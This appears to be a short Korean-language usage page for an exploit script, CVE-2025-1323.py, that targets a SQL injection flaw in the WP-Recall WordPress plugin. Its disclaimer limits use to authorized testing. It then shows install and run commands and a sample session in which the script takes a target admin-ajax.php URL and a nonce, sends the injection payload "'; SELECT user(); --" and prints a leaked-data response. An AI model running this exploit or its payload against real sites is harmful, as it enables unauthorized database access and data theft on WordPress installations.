
WP-Recall 플러그인 SQL 인젝션
WP-Recall 플러그인 SQL 인젝션
이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다.
명시적 허가 없이 시스템에 사용하지 마십시오. 오용 시 불법 행위가 될 수 있습니다.
requests 모듈종속성 설치:
pip install requests
python CVE-2025-1323.py
Enter target URL (e.g. https://target.com/wp-admin/admin-ajax.php): https://example.com/wp-admin/admin-ajax.php
Enter ajax_nonce value: 37c11b0c06
[*] Sending payload: '; SELECT user(); --
[+] Response received:
{"result":"SQL error or leaked data here..."}